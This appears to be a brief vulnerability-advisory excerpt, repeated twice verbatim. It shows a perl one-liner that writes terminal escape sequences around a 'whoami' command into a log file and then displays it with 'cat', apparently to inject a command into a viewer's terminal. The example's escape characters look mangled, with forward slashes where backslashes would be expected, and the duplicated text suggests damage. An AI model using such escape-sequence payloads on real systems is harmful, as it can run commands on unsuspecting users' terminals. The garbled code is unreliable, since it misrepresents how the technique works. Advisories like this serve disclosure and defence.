An attacker may exploit this issue using readily available commands.
The following example is available:
perl -e 'print "/eP/$q/nwhoami/n/e//"' > bla.log
cat bla.log
An attacker may exploit this issue using readily available commands.
The following example is available:
perl -e 'print "/eP/$q/nwhoami/n/e//"' > bla.log
cat bla.log